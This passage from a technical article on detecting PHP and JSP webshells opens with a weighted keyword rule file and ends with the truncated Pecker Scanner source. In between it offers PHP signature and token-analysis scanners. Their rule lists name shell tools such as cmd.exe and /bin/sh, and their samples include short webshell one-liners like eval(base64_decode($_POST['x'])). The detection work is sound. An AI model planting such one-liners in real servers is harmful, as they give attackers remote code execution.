<STR>$S3=$S1(S.$S.prot1a,pa,_3);$S4=$S3($S2($S1(robpr.Q_06.rfnO,o0,q4)))</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$Branch=$B_1.".".$B_2.".".$B_3.".".$B_4.".".$B_5.".".$B_6.".".$B_7.".".$B_8.".".$B_9.".".$B_10.".".$B_11.".".$B_12.".".$B_13;</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR><![CDATA[type=index.php&mbfile=".$mbfile."&titlenum=".$titlenum]]></STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.sun8797.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$Branch_directory_10=getCode(mt_rand(3,5));</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://byc1888.com/skin/ad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.cn/Rvx3Kmv</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$B_d_1.".".$B_d_2.".".$B_d_3.".".$B_d_4.".".$B_d_5.".".$B_d_6</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR><![CDATA[type=index.php&caonima=".$caonima_name."&directory=".$Branch_directory]]></STR> <NUM>80</NUM> </ITEM> </SEO> <EXT> <ITEM>php</ITEM> <ITEM>php4</ITEM> <ITEM>php5</ITEM> <ITEM>inc</ITEM> </EXT> </language> <language> <processor>com.alibaba.security.aegis.webshell.checker.impl.DefaultWebShellChecker</processor> <threshold>80</threshold> <WEBSHELL> <ITEM> <STR>n1nty</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>request.getParameter("f"))).write(request.getParameter("t").getBytes()</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>request.getParameter("path")</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>request.getRealPath(request.getServletPath())</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>Command Window</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>JSP Manage-System</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>JspSpy</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>net localgroup</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>cmd.exe</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>Jfolder</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>jshell</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>pwnshell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>ServerSocket(</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>jsp File browser</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>/bin/sh</STR> <NUM>20</NUM> 
</ITEM> <ITEM> <STR>Backdoor</STR> <NUM>50</NUM> </ITEM> <ITEM> <STR>Runtime.getRuntime()</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>.exec(</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>cmd /c</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>"cmd", "/C"</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>kj021320</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>fuckanquangoutezheng</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n"</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>javascript:delFile('"+folderReplace(file)+"')</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>rt.exec("cmd.exe")</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>JSP Backdoor Reverse Shell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>"\"" + boundary + "\" is an illegal boundary indicator"</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$Id: TelnetIO.java,v 1.10 1808/02/09 10:22:18 leo Exp $</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>void NN(String s</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>void MM(InputStream is</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>void QQ(String cs</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>else if (Z.equals("H"))</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>else if(Z.equals("H"))</STR> <NUM>20</NUM> </ITEM> </WEBSHELL> <EXT> <ITEM>jsp</ITEM> </EXT> </language> </LEX>
PHP WEBSHELL detection flow

1. Agents report about 1.5 million suspected-file sightings per day
2. The reports go to the server, which pulls each distinct file only once, keyed by its MD5
3. An MD5 list plus a text-feature whitelist, both accumulated by the security team, strip out part of the false positives; about 1 million files remain
4. WEBSHELL verdict
   1) YES_WEBSHELL / DELETE_WEBSHELL: about 20,000
   2) NOT_WEBSHELL: about 980,000 (includes sandbox results)
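As an added example (the editor's code, not Alibaba Aegis' DefaultWebShellChecker, whose actual scoring logic is not on the page), the following PHP implements a checker for the rule format listed above (weighted STR/NUM strings, RULE regexes, a per-language threshold) and the server-side MD5 de-duplication and whitelist funnel of the flow just described. The scoring semantics are an assumption: matched STR weights are summed, any RULE match counts as a definite hit, and a file is a webshell when the score reaches the threshold. The rule set and the agent reports are constructed for the example.

```php
<?php
// Added example: a scorer for the <STR>/<NUM> + <RULE> + <threshold> rule format,
// plus the MD5 de-duplication and whitelist funnel. Scoring semantics are assumed.

final class SignatureChecker
{
    private int $threshold;
    /** @var array<int, array{0:string,1:int}> needle/weight pairs */
    private array $strings = [];
    /** @var string[] delimited PCRE patterns */
    private array $rules = [];

    public function __construct(string $xml)
    {
        $doc = new SimpleXMLElement($xml);
        $this->threshold = (int) $doc->threshold;
        foreach ($doc->WEBSHELL->ITEM as $item) {          // direct children only, RULE is separate
            $this->strings[] = [(string) $item->STR, (int) $item->NUM];
        }
        foreach ($doc->WEBSHELL->RULE->ITEM as $rule) {    // rules carry their own (?i) flags
            $this->rules[] = '~' . str_replace('~', '\~', (string) $rule) . '~';
        }
    }

    /** @return array{score:int, hit:bool, matched:string[]} */
    public function check(string $content): array
    {
        $score = 0;
        $matched = [];
        foreach ($this->strings as [$needle, $weight]) {
            if (stripos($content, $needle) !== false) {     // case-insensitive substring (assumption)
                $score += $weight;
                $matched[] = $needle;
            }
        }
        foreach ($this->rules as $re) {
            if (preg_match($re, $content) === 1) {          // a regex hit is treated as definitive
                $score = max($score, $this->threshold);
                $matched[] = $re;
            }
        }
        return ['score' => $score, 'hit' => $score >= $this->threshold, 'matched' => $matched];
    }
}

/**
 * Server-side funnel: one verdict per distinct MD5; MD5-whitelisted files are
 * dropped before scoring; everything else gets a signature verdict.
 *
 * @param array<int, array{0:string,1:string}> $reports      (path, content) pairs from agents
 * @param array<string, true>                  $md5Whitelist known-good hashes kept by the team
 * @return array<string, string> md5 => verdict
 */
function triage(array $reports, array $md5Whitelist, SignatureChecker $checker): array
{
    $verdicts = [];
    foreach ($reports as [$path, $content]) {
        $md5 = md5($content);
        if (isset($verdicts[$md5])) {
            continue;                                       // same file on another host: not pulled again
        }
        if (isset($md5Whitelist[$md5])) {
            $verdicts[$md5] = 'WHITELIST';
            continue;
        }
        $verdicts[$md5] = $checker->check($content)['hit'] ? 'YES_WEBSHELL' : 'NOT_WEBSHELL';
    }
    return $verdicts;
}

// Constructed rule set in the page's format (a handful of entries, not the real database).
$rules = <<<'XML'
<language>
  <processor>example</processor>
  <threshold>80</threshold>
  <WEBSHELL>
    <ITEM><STR>str_rot13('riny')</STR><NUM>80</NUM></ITEM>
    <ITEM><STR>cmd.exe</STR><NUM>50</NUM></ITEM>
    <ITEM><STR>Backdoor</STR><NUM>50</NUM></ITEM>
    <RULE>
      <ITEM>(?i)[^\w]eval\(base64_decode\((\$_GET|\$_POST|\$_REQUEST)\[.{0,34}\]\)\)</ITEM>
      <ITEM>^gif89a</ITEM>
    </RULE>
  </WEBSHELL>
  <EXT><ITEM>php</ITEM></EXT>
</language>
XML;

// Constructed agent reports: two hosts report the same shell, plus one known-good file.
$knownGood = "<?php\nreturn ['db' => 'localhost'];\n";
$reports = [
    ['/var/www/a/up/1.php',    "<?php eval(base64_decode(\$_POST['x']));"],
    ['/var/www/b/img/1.php',   "<?php eval(base64_decode(\$_POST['x']));"],   // duplicate MD5, skipped
    ['/var/www/a/inc/x.php',   "<?php preg_replace('/ad/e','@'.str_rot13('riny').'(\$_POST[1])','ad');"],
    ['/var/www/a/tools/w.php', "<?php // wrapper that launches cmd.exe on Windows hosts"],   // 50 < 80
    ['/var/www/a/tools/c.php', "<?php // Backdoor cleanup: kills stray cmd.exe children"],   // 50 + 50 >= 80
    ['/var/www/a/config.php',  $knownGood],
];

$checker = new SignatureChecker($rules);
foreach (triage($reports, [md5($knownGood) => true], $checker) as $md5 => $verdict) {
    echo substr($md5, 0, 8), '  ', $verdict, "\n";
}
```

The last two tool scripts show the cost of additive keyword scoring: `cmd.exe` alone stays under the threshold, but a harmless comment containing both `cmd.exe` and `Backdoor` crosses it, and that is the kind of false positive the whitelist in step 3 exists to absorb. The `^gif89a` rule is applied as written; whether the production checker lower-cases content before matching (a real GIF header is `GIF89a`) is not stated on the page.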
11. Syntax And Lexical Analysis In WEBSHELL Detection (WEBSHELL detection based on lexical and syntactic analysis)
For plain-text WEBSHELL detection, regex matching performs better than bare signature/keyword matching, but it still produces a large number of false positives. Lexical and syntactic analysis is another promising direction: a tokenizer sees the same token stream the interpreter sees, so the whitespace, comment and case tricks that defeat a regex such as `system\(` (for example `system /* */ (`) make no difference to it.
0x1: Forms of lexical and syntactic analysis

1. Separate code from comments the way the PHP scanner/compiler does
2. Analyse variables, functions, strings and language constructs
3. Capture characteristic token sequences
0x2: Code flow

1. Build the token map

    protected function createTokenMap() {
        $tokenMap = array();
        // 256 is the minimum possible token number, as everything below
        // it is an ASCII value
        for ($i = 256; $i < 1000; ++$i) {
            // T_DOUBLE_COLON is equivalent to T_PAAMAYIM_NEKUDOTAYIM
            if (T_DOUBLE_COLON === $i) {
                $tokenMap[$i] = Pecker_Parser::T_PAAMAYIM_NEKUDOTAYIM;
            // T_OPEN_TAG_WITH_ECHO with dropped T_OPEN_TAG results in T_ECHO
            } elseif (T_OPEN_TAG_WITH_ECHO === $i) {
                $tokenMap[$i] = Pecker_Parser::T_ECHO;
            // T_CLOSE_TAG is equivalent to ';'
            } elseif (T_CLOSE_TAG === $i) {
                $tokenMap[$i] = ord(';');
            // and the others can be mapped directly
            } elseif ('UNKNOWN' !== ($name = token_name($i))
                && defined($name = 'Pecker_Parser::' . $name)
            ) {
                $tokenMap[$i] = constant($name);
            }
        }
        return $tokenMap;
    }

2. Walk the target directory, skip whitelisted directories and read each file's content
3. Skip files protected by Zend encoding

    if (preg_match('/<\?(php)?\s*@Zend;[\r\n]+\d+;/', $code)) {
        $this->errMsg = 'Encrypt with Zend optimizer.';
        return false;
    }

4. Call token_get_all() to obtain the file's token stream
5. Normalise the token stream: drop whitespace, comments and other noise tokens
6. Run the risk checks over the token stream
   1) T_EVAL: extract the whole enclosing token sub-tree
   2) T_FUNCTION: if the current name is one of the sensitive APIs below, extract the whole enclosing token sub-tree (note: in the listing below this branch compares the token text, which is always the literal `function`, against the list, so it never fires; the sensitive-call check that actually runs is the T_STRING branch in item 4)
      1) exec
      2) system
      3) create_function
      4) passthru
      5) shell_exec
      6) proc_open
      7) popen
      8) copy
      9) curl_exec
      10) parse_ini_file
      11) show_source
      12) assert
      13) file_put_contents
      14) call_user_func_array
      15) call_user_func
      16) preg_replace
      17) include
   3) T_VARIABLE: the dynamic-call syntax ($f(...)) that webshells use
      3.1) fetch the previous token
      3.2) fetch the next token

    $ntoken = $this->parser->getNextToken($k);
    $ptoken = $this->parser->getPreToken($k);
    if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new') {
        $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
    }

   4) T_STRING: a direct call to one of the listed functions (next token is `(`, previous token is not `->`, `::` or `function`)
   5) preg_replace callback code execution: when the T_STRING is preg_replace, check whether the pattern literal carries the e modifier (removed in PHP 7.0, so it only executes on PHP 5 interpreters, but it remains a strong indicator of a planted shell)

    if (isset($this->function[$token[1]])) {
        $ntoken = $this->parser->getNextToken($k);
        $ptoken = $this->parser->getPreToken($k);
        if ($ntoken === '(' && $ptoken != '->' && $ptoken != '::' && $ptoken != 'function') {
            if ($token[1] == 'preg_replace') {
                $strRegex = $this->parser->getNextToken($k + 1);
                // check whether the preg_replace pattern string carries the e modifier
                if ($this->_hasCallback($strRegex)) {
                    $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                }
            } else {
                $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
            }
        }
    }

   6) T_INCLUDE
   7) T_INCLUDE_ONCE
   8) T_REQUIRE
   9) T_REQUIRE_ONCE: check whether the code includes a file whose extension is outside the whitelist; this is the familiar "webshell hidden in a .jpg" include. The whitelist is
      9.1) php
      9.2) inc
      9.3) php5
   10) complex (curly) syntax: detect the ${${..}} form
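As an added example (the editor's code, not Pecker's), the checks of steps 5 and 6 above, and the three forms of analysis listed in 0x1, rebuilt directly on token_get_all() so that it runs without Pecker_Parser or Pecker_Loger. The class, its method names, the "reason" strings and the sample files are all this example's own.

```php
<?php
// Added example: token-level webshell checks built directly on token_get_all().

final class TokenScanner
{
    private const SENSITIVE = ['exec', 'system', 'passthru', 'shell_exec', 'proc_open', 'popen',
        'assert', 'create_function', 'call_user_func', 'call_user_func_array',
        'file_put_contents', 'preg_replace'];
    private const INCLUDE_OK = ['php', 'inc', 'php5'];
    // A "(" after one of these is a method call, closure or constructor, not a plain call.
    private const NOT_A_CALL = ['->', '?->', '::', 'function', 'new'];

    /** @return string[] findings as "line N: reason" */
    public static function scan(string $code): array
    {
        // Step 5: drop whitespace and comments so prev/next are the neighbouring significant
        // tokens; "system /* */ (" then looks exactly like "system(".
        $toks = array_values(array_filter(token_get_all($code), function ($t) {
            return !is_array($t) || !in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true);
        }));
        $text = static function ($t) { return is_array($t) ? $t[1] : (string) $t; };
        $nameIds = [T_STRING];                   // PHP 8 tokenises "\system" as one T_NAME_FULLY_QUALIFIED
        if (defined('T_NAME_FULLY_QUALIFIED')) {
            $nameIds[] = constant('T_NAME_FULLY_QUALIFIED');
        }
        $hits = [];
        $line = 1;
        for ($i = 0, $n = count($toks); $i < $n; $i++) {
            $t = $toks[$i];
            if (is_array($t)) {
                $line = $t[2];                   // single-char tokens carry no line: keep the last one seen
            }
            $prev = $i > 0 ? $text($toks[$i - 1]) : '';
            $next = $text($toks[$i + 1] ?? '');
            if ($t === '$' && $next === '{') {   // ${...}: complex (curly) syntax hiding a variable name
                $hits[] = "line $line: complex curly syntax \${...}";
                continue;
            }
            if (!is_array($t)) {
                continue;
            }
            switch ($t[0]) {
                case T_EVAL:
                    $hits[] = "line $line: eval";
                    break;
                case T_VARIABLE:                 // $f(...) or $_POST['f'](...): a call through a variable
                    $j = $i + 1;
                    while (($toks[$j] ?? '') === '[') {
                        $j = self::closingBracket($toks, $j) + 1;
                    }
                    if ($text($toks[$j] ?? '') === '(' && !in_array($prev, self::NOT_A_CALL, true)) {
                        $hits[] = "line $line: call through variable {$t[1]}";
                    }
                    break;
                case T_INCLUDE: case T_INCLUDE_ONCE: case T_REQUIRE: case T_REQUIRE_ONCE:
                    $arg = $toks[$next === '(' ? $i + 2 : $i + 1] ?? '';   // include("x") or include "x"
                    if (is_array($arg) && $arg[0] === T_CONSTANT_ENCAPSED_STRING) {
                        $path = substr($arg[1], 1, -1);
                        if (!in_array(strtolower(pathinfo($path, PATHINFO_EXTENSION)), self::INCLUDE_OK, true)) {
                            $hits[] = "line $line: {$t[1]} of non-PHP file $path";
                        }
                    }                            // dynamic paths are skipped: too common in frameworks
                    break;
                default:
                    if (!in_array($t[0], $nameIds, true)) {
                        break;
                    }
                    $name = strtolower(ltrim($t[1], '\\'));
                    if (!in_array($name, self::SENSITIVE, true) || $next !== '('
                        || in_array($prev, self::NOT_A_CALL, true)) {
                        break;
                    }
                    if ($name !== 'preg_replace') {
                        $hits[] = "line $line: call to $name()";
                        break;
                    }
                    // preg_replace only executes code with the /e modifier (removed in PHP 7.0),
                    // or with a pattern we cannot see; a non-literal pattern is reported as well.
                    $pat = $toks[$i + 2] ?? '';
                    if (!is_array($pat) || $pat[0] !== T_CONSTANT_ENCAPSED_STRING) {
                        $hits[] = "line $line: preg_replace with non-literal pattern";
                    } elseif (self::hasEModifier($pat[1])) {
                        $hits[] = "line $line: preg_replace with /e modifier";
                    }
            }
        }
        return $hits;
    }

    /** Index of the "]" matching the "[" at $open (count($toks) if unbalanced). */
    private static function closingBracket(array $toks, int $open): int
    {
        for ($depth = 0, $j = $open, $n = count($toks); $j < $n; $j++) {
            if ($toks[$j] === '[') {
                $depth++;
            } elseif ($toks[$j] === ']' && --$depth === 0) {
                return $j;
            }
        }
        return $n;
    }

    /** True when a pattern literal such as '/ad/e' or '[a-z]ie' carries the e modifier. */
    private static function hasEModifier(string $literal): bool
    {
        $p = (string) substr($literal, 1, -1);   // drop the string literal's quotes
        if ($p === '') {
            return false;
        }
        $close = strtr($p[0], '([{<', ')]}>');   // bracket-style delimiters pair up
        $end = strrpos($p, $close);
        return $end > 0 && strpos(substr($p, $end + 1), 'e') !== false;
    }
}

// Constructed samples: one benign file and the webshell idioms covered by the checks above.
$samples = [
    'benign'   => '<?php function render($tpl, $name) { return str_replace("{name}", htmlspecialchars($name), $tpl); }',
    'eval'     => '<?php eval($_POST["c"]);',
    'spaced'   => '<?php system /* a regex for "system(" misses this */ ($_GET["c"]);',
    'var-call' => '<?php $f = "as"."sert"; $f($_REQUEST["x"]); $_POST["f"]($_POST["a"]);',
    'preg-e'   => "<?php preg_replace('/ad/e', '@'.str_rot13('riny').'(\$_POST[1])', 'ad');",
    'include'  => '<?php include "upload/avatar.jpg";',
    'curly'    => '<?php $a = "_POST"; ${$a}["f"](${$a}["c"]);',
];
foreach ($samples as $name => $code) {
    $hits = TokenScanner::scan($code);
    printf("%-9s %s\n", $name, $hits ? implode('; ', $hits) : 'clean');
}
```

The `spaced` sample is the point of the whole section: once whitespace and comments are filtered out of the token stream, the call is indistinguishable from `system(`, while a text regex anchored on `system\(` never sees it. The trade-off is that calls through variables and non-literal preg_replace patterns are reported on syntax alone, so a framework that dispatches through `$handler(...)` will produce findings that need the whitelist from the detection flow above.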
0x3: Usage after wrapping the scanner in a class
class
<?php
/**
 * Pecker Scanner Lite
 *
 * You may not change or alter any portion of this comment or credits
 * of supporting developers from this source code or any supporting source code
 * which is considered copyrighted (c) material of the original comment or credit authors.
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 *
 * The source of this document, reference to PHP-Parser.
 *
 * @copyright Pecker Scanner http://www.cnxct.com
 * @license http://www.fsf.org/copyleft/gpl.html GNU public license
 * @author CFC4N <cfc4n@cnxct.com>
 * @package Lexer All
 * @version $Id: PeckerScanner.lite.php 31 2014-05-27 08:09:52Z cfc4n $
 */
class Pecker_Scanner
{
    private $extend = array();
    private $parser;
    private $report;
    private $function;
    private $path;
    private $dropdir = array(); // input target file path which need to be scan

    function __construct()
    {
        set_time_limit(0);
        define('MAX_STRLEN', 500); // max length value of hash string
        $config = array(
            'extend'   => array('php', 'inc', 'php5'),
            'function' => array('exec', 'system', 'create_function', 'passthru', 'shell_exec',
                'proc_open', 'popen', 'copy', 'curl_exec', 'parse_ini_file', 'show_source',
                'assert', 'file_put_contents', 'call_user_func_array', 'call_user_func',
                'preg_replace', 'include'),
        );
        $this->setExtend($config['extend']);
        $this->setFunction($config['function']);
        $this->parser = new Pecker_Parser(new Pecker_Lexer());
        $this->report = new Pecker_Loger();
        $this->extend['php'] = true;
    }

    /**
     * set expansion name
     * @param array $extend
     */
    public function setExtend(array $extend)
    {
        foreach ($extend as $v) {
            $this->extend[trim(trim($v), '.')] = true;
        }
        if (!isset($this->extend['php'])) {
            $this->extend['php'] = true;
        }
    }

    /**
     * set functions of check list
     * @param array $function
     */
    public function setFunction(array $function)
    {
        foreach ($function as $fun) {
            $this->function[trim($fun)] = true;
        }
        if (!isset($this->function['eval'])) {
            $this->function['eval'] = true;
        }
    }

    /**
     * scan files
     * @param string $file
     * @return boolean
     */
    public function scanFileContent($file, $fileContent)
    {
        $this->report->setFile($file);
        $bRS = $this->parser->parse($fileContent);
        if (false === $bRS) {
            $this->report->errorLog($this->parser->getErrmsg());
            return false;
        }
        $this->checkTokens($this->parser->getTokens());
        return true;
    }

    /**
     * check dangerous functions
     * @param array $tokens
     */
    private function checkTokens(array $tokens)
    {
        $i = 0;
        $curly = false;
        $curly_str = '';
        $curly_num = 0;
        foreach ($tokens as $k => $token) {
            if (!$curly && is_array($token)) {
                switch ($token[0]) {
                    case T_EVAL:
                        $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                        break;
                    case T_FUNCTION:
                        // $token[1] is the literal text "function" here, so this never matches the list
                        if (isset($this->function[$token[1]])) {
                            $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                        }
                        break;
                    case T_VARIABLE:
                        $ntoken = $this->parser->getNextToken($k);
                        $ptoken = $this->parser->getPreToken($k);
                        // $func(...): a call through a variable
                        if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new') {
                            $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                        } elseif ($ntoken === '{' || $ntoken === '[') {
                            // $arr['x'](...): a call through an array element
                            $nt = $this->parser->getVariableToken($k);
                            if ($nt['token'] === '(') {
                                $this->report->catchLog($token[1] . $nt['func'], $token[2], $this->parser->getPieceTokenAll($nt['key'] + $k));
                            }
                        }
                        break;
                    case T_STRING:
                        if (isset($this->function[$token[1]])) {
                            $ntoken = $this->parser->getNextToken($k);
                            $ptoken = $this->parser->getPreToken($k);
                            if ($ntoken === '(' && $ptoken != '->' && $ptoken != '::' && $ptoken != 'function') {
                                if ($token[1] == 'preg_replace') {
                                    $strRegex = $this->parser->getNextToken($k + 1);
                                    if ($this->_hasCallback($strRegex)) {
                                        $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                                    }
                                } else {
                                    $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                                }
                            }
                        }
                        break;
                    case T_INCLUDE:
                    case T_INCLUDE_ONCE:
                    case T_REQUIRE:
                    case T_REQUIRE_ONCE:
                        if (isset($this->function['include']) || isset($this->function['include_once'])
                            || isset($this->function['require']) || isset($this->function['require_once'])) {
                            $infile = $this->parser->getFilepathToken($k);
                            $fileinfo = pathinfo($infile);
                            // a path without an extension is not on the whitelist either
                            $ext = isset($fileinfo['extension']) ? $fileinfo['extension'] : '';
                            if (!isset($this->extend[$ext])) {
                                $this->report->catchLog($token[1], $token[2], $this->parser->getPieceTokenAll($k));
                            }
                        }
                        break;
                    default:
                }
            } elseif ($curly) {
                // Complex (curly) syntax: collect everything up to the matching "}"
                if (!is_array($token)) {
                    if ($token === '{') {
                        $curly_str .= '{';
                        $curly_num++;
                    } elseif ($token === '}') {
                        $curly_str .= '}';
                        $curly_num--;
                    }
                } else {
                    $curly_str .= $token[1];
                }
                if ($curly_num == 0) {
                    $curly = false;
                    $this->report->catchLog($curly_str, 0, $this->parser->getPieceTokenAll($k));
                }
            } elseif ($token === '$') {
                /**
                 * Zend_language_scanner.c : yy56, yy61
                 * $nt = $this->parser->getNextToken($k);
                 * switch ($nt) {
                 *     case '$': break;
                 *     case '\\': break;
                 *     case '{': break;
                 *     default:
                 * }
                 */
                $nt = $this->parser->getVariableToken($k);
                if ($nt['token'] === '{') {
                    $curly = true;
                    $curly_str = '$';
                    $curly_num = 0;
                }
            }
        }
    }

    /**
     * get results
     * @return Ambigous <multitype:, multitype:boolean string multitype: >
     */
    public function getReport()
    {
        return $this->report->getReport();
    }

    /**
     * grep modifier 'e' in regex string
     * @param string $str
     * @return boolean
     */
    private function _hasCallback($str)
    {
        $str = trim($str);
        if (substr($str, 0, 1) == '$') {
            return true; // the pattern is a variable, treated as suspicious
        }
        $a = substr(substr($str, 1), 0, -1); // strip the quotes of the string literal
        $start_delimiter = $end_delimiter = $a[0];
        $strabc = '([{< )]}>';
        if (false !== ($num = strpos($strabc, $start_delimiter))) {
            $end_delimiter = $strabc[$num + 5]; // bracket delimiters close with their counterpart
        }
        if (false !== ($num1 = strrpos($str, $end_delimiter))) {
            $modifiers = substr($str, $num1 + 1);
            if (false !== strpos($modifiers, 'e')) {
                return true;
            }
        }
        return false;
    }
}

class Pecker_Lexer
{
    protected $code;
    protected $tokens;
    protected $pos;
    protected $line;
    protected $errMsg;
    protected $dropTokens;
    protected $tokenMap;

    public function __construct()
    {
        $this->tokenMap = $this->createTokenMap();
        // map of tokens to drop while lexing (the map is only used for isset lookup,
        // that's why the value is simply set to 1; the value is never actually used.)
        $this->dropTokens = array_fill_keys(array(T_WHITESPACE, T_OPEN_TAG), 1);
    }

    /**
     * Initializes the lexer for lexing the provided source code.
     *
     * @param string $code The source code to lex
     *
     * @throws PHPParser_Error on lexing errors (unterminated comment or unexpected character)
     */
    public function startLexing($code)
    {
        if (preg_match('/<\?(php)?\s*@Zend;[\r\n]+\d+;/', $code)) {
            $this->errMsg = 'Encrypt with Zend optimizer.';
            return false;
        }
        $this->resetErrors();
        $this->tokens = token_get_all($code);
        $this->code = $code;
        $this->pos = -1;
        $this->line = 1;
        return $this->checkError();
    }

    protected function resetErrors()
    {
        // clear error_get_last() by forcing an undefined variable error
        @$undefinedVariable;
    }

    protected function checkError()
    {
        $error = error_get_last();
        if (null === $error) {
            return true;
        }
        if (preg_match('~^Unterminated comment starting line ([0-9]+)$~', $error['message'], $matches)) {
            $this->errMsg = 'Unterminated comment at line ' . $matches[1];
            return false;
        }
        if (preg_match('~^Unexpected character in input: \'(.)\' \(ASCII=([0-9]+)\)~s', $error['message'], $matches)) {
            $this->errMsg = sprintf('Unexpected character "%s" (ASCII %d)', $matches[1], $matches[2]);
            return false;
        }
        // PHP cuts error message after null byte, so need special case
        if (preg_match('~^Unexpected character in input: \'$~', $error['message'])) {
            return false;
        }
        // @todo detect other kinds of syntax errors
        return true;
    }

    public function getError()
    {
        return $this->errMsg;
    }

    /**
     * Fetches the next token.
     *
     * @param mixed $value           Variable to store token content in
     * @param mixed $startAttributes Variable to store start attributes in
     * @param mixed $endAttributes   Variable to store end attributes in
     *
     * @return int Token id
     */
    public function getNextToken(&$value = null, &$startAttributes = null, &$endAttributes = null)
    {
        $startAttributes = array();
        $endAttributes = array();
        while (isset($this->tokens[++$this->pos])) {
            $token = $this->tokens[$this->pos];
            if (is_string($token)) {
                $startAttributes['startLine'] = $this->line;
                $endAttributes['endLine'] = $this->line;
                // bug in token_get_all
                if ('b"' === $token) {
                    $value = 'b"';
                    return ord('"');
                } else {
                    $value = $token;
                    return ord($token);
                }
            } else {
                $this->line += substr_count($token[1], "\n");
                if (T_COMMENT === $token[0]) {
                    // $startAttributes['comments'][] = new PHPParser_Comment($token[1], $token[2]);
                } elseif (T_DOC_COMMENT === $token[0]) {
                    // $startAttributes['comments'][] = new PHPParser_Comment_Doc($token[1], $token[2]);
                } elseif (!isset($this->dropTokens[$token[0]])) {
                    $value = $token[1];
                    $startAttributes['startLine'] = $token[2];
                    $endAttributes['endLine'] = $this->line;
                    return $this->tokenMap[$token[0]];
                }
            }
        }
        $startAttributes['startLine'] = $this->line;
        // 0 is the EOF token
        return 0;
    }

    /**
     * Creates the token map.
     *
     * The token map maps the PHP internal token identifiers
     * to the identifiers used by the Parser. Additionally it
     * maps T_OPEN_TAG_WITH_ECHO to T_ECHO and T_CLOSE_TAG to ';'.
* * @return array The token map */ protected function createTokenMap() { $tokenMap = array(); // 256 is the minimum possible token number, as everything below // it is an ASCII value for ($i = 256; $i < 1000; ++$i) { // T_DOUBLE_COLON is equivalent to T_PAAMAYIM_NEKUDOTAYIM if (T_DOUBLE_COLON === $i) { $tokenMap[$i] = Pecker_Parser::T_PAAMAYIM_NEKUDOTAYIM; // T_OPEN_TAG_WITH_ECHO with dropped T_OPEN_TAG results in T_ECHO } elseif(T_OPEN_TAG_WITH_ECHO === $i) { $tokenMap[$i] = Pecker_Parser::T_ECHO; // T_CLOSE_TAG is equivalent to ';' } elseif(T_CLOSE_TAG === $i) { $tokenMap[$i] = ord(';'); // and the others can be mapped directly } elseif ('UNKNOWN' !== ($name = token_name($i)) && defined($name = 'Pecker_Parser::' . $name) ) { $tokenMap[$i] = constant($name); } } return $tokenMap; } public function getTokens() { return $this->tokens; } } class Pecker_Parser { const TOKEN_NONE = -1; const TOKEN_INVALID = 151; const TOKEN_MAP_SIZE = 386; const YYLAST = 1008; const YY2TBLSTATE = 316; const YYGLAST = 444; const YYNLSTATES = 531; const YYUNEXPECTED = 32767; const YYDEFAULT = -32766; // {{{ Tokens const YYERRTOK = 256; const T_INCLUDE = 257; const T_INCLUDE_ONCE = 258; const T_EVAL = 259; const T_REQUIRE = 260; const T_REQUIRE_ONCE = 261; const T_LOGICAL_OR = 262; const T_LOGICAL_XOR = 263; const T_LOGICAL_AND = 264; const T_PRINT = 265; const T_YIELD = 266; const T_PLUS_EQUAL = 267; const T_MINUS_EQUAL = 268; const T_MUL_EQUAL = 269; const T_DIV_EQUAL = 270; const T_CONCAT_EQUAL = 271; const T_MOD_EQUAL = 272; const T_AND_EQUAL = 273; const T_OR_EQUAL = 274; const T_XOR_EQUAL = 275; const T_SL_EQUAL = 276; const 